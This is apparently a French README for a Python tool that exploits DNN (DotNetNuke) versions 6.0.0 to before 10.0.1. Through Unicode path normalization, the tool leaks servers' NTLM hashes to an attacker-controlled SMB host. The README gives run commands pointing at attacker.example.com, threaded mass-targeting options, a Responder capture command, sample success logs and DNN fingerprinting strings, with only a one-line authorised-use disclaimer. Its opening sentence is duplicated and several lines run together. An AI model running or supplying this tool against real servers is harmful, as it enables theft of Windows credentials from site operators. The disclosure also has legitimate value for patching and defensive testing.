
Cet exploit cible une vulnérabilité dans DNN (anciennement DotNetNuke) versions 6.0.0 à avant 10.0.1 qui permet aux attaquants de divulguer des hachages NTLM via des attaques de normalisation de chemin Unicode.
Cet exploit cible une vulnérabilité dans DNN (anciennement DotNetNuke) versions 6.0.0 à avant 10.0.1 qui permet aux attaquants de divulguer des hachages NTLM via des attaques de normalisation de chemin Unicode.
L'exploit abuse des particularités de Windows/.NET et de la normalisation Unicode pour forcer le serveur DNN cible à effectuer des requêtes SMB vers un serveur contrôlé par l'attaquant, exposant potentiellement des hachages NTLM lors du processus d'authentification.
pip install -r requirements.txt)python main.py targets.txt attacker.example.com
python main.py targets.txt 192.168.1.100 -t 20 --timeout 15
targets : Fichier contenant la liste des hôtes DNN (un par ligne)smb_server : Nom d'hôte/IP du serveur SMB pour capturer les hachages NTLM-t, --threads : Nombre de threads simultanés (défaut : 10)--timeout : Délai d'attente de requête en secondes (défaut : 10)Créez un fichier texte avec les URL cibles, une par ligne :
http://target1.example.com
https://target2.example.com:8080
target3.example.com
Vous pouvez utiliser des outils comme Responder pour capturer les hachages NTLM :
responder -I eth0 -wrf
Ou utilisez Burp Collaborator pour la détection hors bande.
[2025-01-XX-XX:XX:XX] [INFO] Démarrage de l'exploit de divulgation de hachage NTLM DNN contre 5 cibles
[2025-01-XX-XX:XX:XX] [INFO] Serveur SMB : attacker.example.com
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Indicateur DNN trouvé : dnn_IsMobile
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Point de terminaison de téléversement accessible
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Charge utile de l'exploit envoyée avec succès
[2025-01-XX-XX:XX:XX] [INFO] [target1.com] Vérifiez votre serveur SMB pour les tentatives d'authentification NTLM entrantes
L'exploit recherche les indicateurs DNN suivants :
dnn_IsMobiledotnetnuke dans la réponsednnconnect dans la réponseDNN Platform dans la réponseCet outil est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. Utilisez-le de manière responsable et uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation explicite de test.